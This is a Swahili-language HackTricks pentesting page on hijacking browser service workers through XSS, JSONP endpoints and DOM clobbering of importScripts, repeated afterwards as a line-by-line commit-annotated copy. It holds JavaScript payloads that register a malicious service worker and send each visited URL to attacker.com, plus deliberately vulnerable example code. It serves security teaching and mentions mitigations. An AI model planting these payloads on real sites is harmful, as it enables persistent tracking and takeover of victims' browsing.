hacktricks/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md

# Kutumia Wafanyakazi wa Huduma

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikionyeshwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

**Kikundi cha Usalama cha Kujaribu Kwa Bidii**

<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>

{% embed url="https://discord.gg/tryhardsecurity" %}

***

## Taarifa Msingi

**Mfanyakazi wa huduma** ni skripti inayotekelezwa na kivinjari chako nyuma, tofauti na ukurasa wowote wa wavuti, ikiruhusu vipengele visivyohitaji ukurasa wa wavuti au mwingiliano wa mtumiaji, hivyo kuimarisha uwezo wa **kufanya kazi nje ya mtandao na nyuma ya pazia**. Maelezo kamili kuhusu wafanyakazi wa huduma yanaweza kupatikana [hapa](https://developers.google.com/web/fundamentals/primers/service-workers). Kwa kudukua wafanyakazi wa huduma ndani ya kikoa dhaifu cha wavuti, wadukuzi wanaweza kupata udhibiti juu ya mwingiliano wa mwathiriwa na kurasa zote ndani ya kikoa hicho.

### Kuangalia Wafanyakazi wa Huduma Zilizopo

Wafanyakazi wa huduma zilizopo wanaweza kuangaliwa katika sehemu ya **Wafanyakazi wa Huduma** ya kichupo cha **Maombi** katika **Zana za Mwandishi**. Njia nyingine ni kutembelea [chrome://serviceworker-internals](https://chromium.googlesource.com/chromium/src/+/main/docs/security/chrome%3A/serviceworker-internals) kwa mtazamo wa kina zaidi.

### Arifa za Kupiga

**Ruhusa za arifa za kupiga** zinaathiri moja kwa moja uwezo wa **mfanyakazi wa huduma** kuwasiliana na seva bila mwingiliano moja kwa moja wa mtumiaji. Ikiwa ruhusa zimekataliwa, inapunguza uwezo wa mfanyakazi wa huduma kuwa tishio endelevu. Kinyume chake, kutoa ruhusa kunazidisha hatari za usalama kwa kuruhusu kupokea na kutekeleza udanganyifu wa uwezekano.

## Shambulio la Kuunda Mfanyakazi wa Huduma

Ili kutumia udhaifu huu unahitaji kupata:

* Njia ya **kupakia faili za JS za kupendelea** kwenye seva na **XSS ya kupakia mfanyakazi wa huduma** wa faili ya JS iliyopakiwa
* **Ombi dhaifu la JSONP** ambapo unaweza **kudhibiti matokeo (na msimbo wa JS wa kupendelea)** na **XSS** ya **kupakia JSONP na mzigo** ambao uta **paki mfanyakazi wa huduma mbaya**.

Katika mfano ufuatao nitawasilisha msimbo wa **kujiandikisha mfanyakazi wa huduma mpya** ambao utasikiliza tukio la `fetch` na **kutuma kwenye seva ya wadukuzi kila URL iliyopakiwa** (hii ni msimbo utakaohitaji **kupakia** kwenye **seva** au kupakia kupitia jibu la **JSONP dhaifu**):
```javascript
self.addEventListener('fetch', function(e) {
e.respondWith(caches.match(e.request).then(function(response) {
fetch('https://attacker.com/fetch_url/' + e.request.url)
});
```
Na hii ndio nambari itakayosajili mfanyakazi (nambari unayopaswa kuweza kutekeleza kwa kutumia **XSS**). Katika kesi hii, ombi la **GET** litatumwa kwa **seva ya wachokozi** ikitoa taarifa ikiwa usajili wa mfanyakazi wa huduma ulifanikiwa au la:
```javascript
<script>
window.addEventListener('load', function() {
var sw = "/uploaded/ws_js.js";
navigator.serviceWorker.register(sw, {scope: '/'})
.then(function(registration) {
var xhttp2 = new XMLHttpRequest();
xhttp2.open("GET", "https://attacker.com/SW/success", true);
xhttp2.send();
}, function (err) {
var xhttp2 = new XMLHttpRequest();
xhttp2.open("GET", "https://attacker.com/SW/error", true);
xhttp2.send();
});
});
</script>
```
Katika kesi ya kutumia mwisho wa JSONP unaoweza kudhuriwa unapaswa kuweka thamani ndani ya `var sw`. Kwa mfano:
```javascript
var sw = "/jsonp?callback=onfetch=function(e){ e.respondWith(caches.match(e.request).then(function(response){ fetch('https://attacker.com/fetch_url/' + e.request.url) }) )}//";
```
Kuna **C2** iliyotengwa kwa **utumiaji wa Wafanyikazi wa Huduma** inaitwa [**Wafanyikazi wa Kivuli**](https://shadow-workers.github.io) ambayo itakuwa muhimu sana kwa kutumia udhaifu huu.

**Mwongozo wa cache wa masaa 24** unapunguza maisha ya **wafanyikazi wa huduma (SW)** wenye nia mbaya au walioathiriwa hadi masaa 24 baada ya kurekebisha udhaifu wa XSS, ikizingatiwa hali ya mteja mtandaoni. Ili kupunguza udhaifu, waendeshaji wa tovuti wanaweza kupunguza Muda wa Kuishi wa Script ya SW (TTL). Waendelezaji pia wanashauriwa kuunda [**kitufe cha kuzima wafanyikazi wa huduma**](https://stackoverflow.com/questions/33986976/how-can-i-remove-a-buggy-service-worker-or-implement-a-kill-switch/38980776#38980776) kwa kuzima haraka.

## Kutumia `importScripts` katika SW kupitia DOM Clobbering

Kazi ya **`importScripts`** iliyoitwa kutoka kwa Wafanyikazi wa Huduma inaweza **kuagiza script kutoka kwenye kikoa tofauti**. Ikiwa kazi hii inaitwa kutumia **parameter ambayo muhusika anaweza** kuhariri, angekuwa na uwezo wa **kuagiza script ya JS kutoka kwenye kikoa chake** na kupata XSS.

**Hii hata inapita kinga za CSP.**

**Mfano wa msimbo wenye udhaifu:**

* **index.html**
```html
<script>
navigator.serviceWorker.register('/dom-invader/testcases/augmented-dom-import-scripts/sw.js' + location.search);
// attacker controls location.search
</script>
```
* **sw.js**
```javascript
const searchParams = new URLSearchParams(location.search);
let host = searchParams.get('host');
self.importScripts(host + "/sw_extra.js");
//host can be controllable by an attacker
```
### Kwa DOM Clobbering

Kwa habari zaidi kuhusu ni nini DOM Clobbering angalia:

{% content-ref url="dom-clobbering.md" %}
[dom-clobbering.md](dom-clobbering.md)
{% endcontent-ref %}

Ikiwa URL/domain ambapo SW inatumia kuita **`importScripts`** iko **ndani ya kipengele cha HTML**, ni **inawezekana kuibadilisha kupitia DOM Clobbering** ili kufanya SW **ipakie script kutoka kwenye kikoa chako mwenyewe**.

Kwa mfano wa hili angalia kiungo cha marejeo.

## Marejeo

* [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)

**Kikundi cha Usalama cha Try Hard**

<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>

{% embed url="https://discord.gg/tryhardsecurity" %}

<details>

<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`# Kutumia Wafanyakazi wa Huduma`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
			`<details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			`* Je, unafanya kazi katika kampuni ya usalama wa mtandao? Unataka kuona kampuni yako ikionyeshwa kwenye HackTricks? au unataka kupata upatikanaji wa toleo jipya la PEASS au kupakua HackTricks kwa PDF? Angalia [MIPANGO YA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-24 13:37:52 +00:00			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`* Pata [bidhaa rasmi za PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			`* Jiunge na [💬](https://emojipedia.org/speech-balloon/) [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au kikundi cha [telegram](https://t.me/peass) au nifuata kwenye Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
			`</details>`

Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			`Kikundi cha Usalama cha Kujaribu Kwa Bidii`
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			`<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>`
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00
			`{% embed url="https://discord.gg/tryhardsecurity" %}`

			`***`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Taarifa Msingi`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			Mfanyakazi wa huduma ni skripti inayotekelezwa na kivinjari chako nyuma, tofauti na ukurasa wowote wa wavuti, ikiruhusu vipengele visivyohitaji ukurasa wa wavuti au mwingiliano wa mtumiaji, hivyo kuimarisha uwezo wa kufanya kazi nje ya mtandao na nyuma ya pazia. Maelezo kamili kuhusu wafanyakazi wa huduma yanaweza kupatikana [hapa](https://developers.google.com/web/fundamentals/primers/service-workers). Kwa kudukua wafanyakazi wa huduma ndani ya kikoa dhaifu cha wavuti, wadukuzi wanaweza kupata udhibiti juu ya mwingiliano wa mwathiriwa na kurasa zote ndani ya kikoa hicho.
a 2024-02-06 03:10:27 +00:00
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			`### Kuangalia Wafanyakazi wa Huduma Zilizopo`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			`Wafanyakazi wa huduma zilizopo wanaweza kuangaliwa katika sehemu ya Wafanyakazi wa Huduma ya kichupo cha Maombi katika Zana za Mwandishi. Njia nyingine ni kutembelea [chrome://serviceworker-internals](https://chromium.googlesource.com/chromium/src/+/main/docs/security/chrome%3A/serviceworker-internals) kwa mtazamo wa kina zaidi.`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2024-03-09 13:36:24 +00:00			`### Arifa za Kupiga`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			`Ruhusa za arifa za kupiga zinaathiri moja kwa moja uwezo wa mfanyakazi wa huduma kuwasiliana na seva bila mwingiliano moja kwa moja wa mtumiaji. Ikiwa ruhusa zimekataliwa, inapunguza uwezo wa mfanyakazi wa huduma kuwa tishio endelevu. Kinyume chake, kutoa ruhusa kunazidisha hatari za usalama kwa kuruhusu kupokea na kutekeleza udanganyifu wa uwezekano.`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Shambulio la Kuunda Mfanyakazi wa Huduma`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2024-03-09 13:36:24 +00:00			`Ili kutumia udhaifu huu unahitaji kupata:`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2024-03-09 13:36:24 +00:00			`* Njia ya kupakia faili za JS za kupendelea kwenye seva na XSS ya kupakia mfanyakazi wa huduma wa faili ya JS iliyopakiwa`
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-24 13:37:52 +00:00			`* Ombi dhaifu la JSONP ambapo unaweza kudhibiti matokeo (na msimbo wa JS wa kupendelea) na XSS ya kupakia JSONP na mzigo ambao uta paki mfanyakazi wa huduma mbaya.`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			Katika mfano ufuatao nitawasilisha msimbo wa kujiandikisha mfanyakazi wa huduma mpya ambao utasikiliza tukio la `fetch` na kutuma kwenye seva ya wadukuzi kila URL iliyopakiwa (hii ni msimbo utakaohitaji kupakia kwenye seva au kupakia kupitia jibu la JSONP dhaifu):
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00			```javascript
			`self.addEventListener('fetch', function(e) {`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`e.respondWith(caches.match(e.request).then(function(response) {`
			`fetch('https://attacker.com/fetch_url/' + e.request.url)`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00			`});`
			```
Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2024-03-09 13:36:24 +00:00			`Na hii ndio nambari itakayosajili mfanyakazi (nambari unayopaswa kuweza kutekeleza kwa kutumia XSS). Katika kesi hii, ombi la GET litatumwa kwa seva ya wachokozi ikitoa taarifa ikiwa usajili wa mfanyakazi wa huduma ulifanikiwa au la:`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00			```javascript
			`<script>`
			`window.addEventListener('load', function() {`
			`var sw = "/uploaded/ws_js.js";`
			`navigator.serviceWorker.register(sw, {scope: '/'})`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`.then(function(registration) {`
			`var xhttp2 = new XMLHttpRequest();`
			`xhttp2.open("GET", "https://attacker.com/SW/success", true);`
			`xhttp2.send();`
			`}, function (err) {`
			`var xhttp2 = new XMLHttpRequest();`
			`xhttp2.open("GET", "https://attacker.com/SW/error", true);`
			`xhttp2.send();`
			`});`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00			`});`
			`</script>`
			```
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-24 13:37:52 +00:00			Katika kesi ya kutumia mwisho wa JSONP unaoweza kudhuriwa unapaswa kuweka thamani ndani ya `var sw`. Kwa mfano:
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00			```javascript
			`var sw = "/jsonp?callback=onfetch=function(e){ e.respondWith(caches.match(e.request).then(function(response){ fetch('https://attacker.com/fetch_url/' + e.request.url) }) )}//";`
			```
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			`Kuna C2 iliyotengwa kwa utumiaji wa Wafanyikazi wa Huduma inaitwa [Wafanyikazi wa Kivuli](https://shadow-workers.github.io) ambayo itakuwa muhimu sana kwa kutumia udhaifu huu.`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			Mwongozo wa cache wa masaa 24 unapunguza maisha ya wafanyikazi wa huduma (SW) wenye nia mbaya au walioathiriwa hadi masaa 24 baada ya kurekebisha udhaifu wa XSS, ikizingatiwa hali ya mteja mtandaoni. Ili kupunguza udhaifu, waendeshaji wa tovuti wanaweza kupunguza Muda wa Kuishi wa Script ya SW (TTL). Waendelezaji pia wanashauriwa kuunda [kitufe cha kuzima wafanyikazi wa huduma](https://stackoverflow.com/questions/33986976/how-can-i-remove-a-buggy-service-worker-or-implement-a-kill-switch/38980776#38980776) kwa kuzima haraka.
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			## Kutumia `importScripts` katika SW kupitia DOM Clobbering
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			Kazi ya `importScripts` iliyoitwa kutoka kwa Wafanyikazi wa Huduma inaweza kuagiza script kutoka kwenye kikoa tofauti. Ikiwa kazi hii inaitwa kutumia parameter ambayo muhusika anaweza kuhariri, angekuwa na uwezo wa kuagiza script ya JS kutoka kwenye kikoa chake na kupata XSS.
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2024-03-09 13:36:24 +00:00			`Hii hata inapita kinga za CSP.`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`Mfano wa msimbo wenye udhaifu:`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
			`* index.html`
			```html
			`<script>`
			`navigator.serviceWorker.register('/dom-invader/testcases/augmented-dom-import-scripts/sw.js' + location.search);`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`// attacker controls location.search`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00			`</script>`
			```
			`* sw.js`
			```javascript
			`const searchParams = new URLSearchParams(location.search);`
			`let host = searchParams.get('host');`
			`self.importScripts(host + "/sw_extra.js");`
			`//host can be controllable by an attacker`
			```
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-24 12:32:36 +00:00			`### Kwa DOM Clobbering`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2024-03-09 13:36:24 +00:00			`Kwa habari zaidi kuhusu ni nini DOM Clobbering angalia:`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
			`{% content-ref url="dom-clobbering.md" %}`
			`[dom-clobbering.md](dom-clobbering.md)`
			`{% endcontent-ref %}`

Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-24 12:32:36 +00:00			Ikiwa URL/domain ambapo SW inatumia kuita `importScripts` iko ndani ya kipengele cha HTML, ni inawezekana kuibadilisha kupitia DOM Clobbering ili kufanya SW ipakie script kutoka kwenye kikoa chako mwenyewe.
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2024-03-09 13:36:24 +00:00			`Kwa mfano wa hili angalia kiungo cha marejeo.`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Marejeo`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
			`* [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)`

Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`Kikundi cha Usalama cha Try Hard`

Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			`<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>`
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00
			`{% embed url="https://discord.gg/tryhardsecurity" %}`

GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00			`<details>`

Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-24 12:32:36 +00:00			`<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`* Je, unafanya kazi katika kampuni ya usalama wa mtandao? Je, unataka kuona kampuni yako ikitangazwa kwenye HackTricks? au unataka kupata upatikanaji wa toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF? Angalia [MIPANGO YA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2024-03-09 13:36:24 +00:00			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) ya kipekee`
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-24 12:32:36 +00:00			`* Pata [swag rasmi ya PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Jiunge na [💬](https://emojipedia.org/speech-balloon/) [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au kikundi cha [telegram](https://t.me/peass) au nifuata kwenye Twitter 🐦[@carlospolopm](https://twitter.com/hacktricks_live).`
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			`* Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3689] No subject 2022-12-20 11:25:07 +00:00
			`</details>`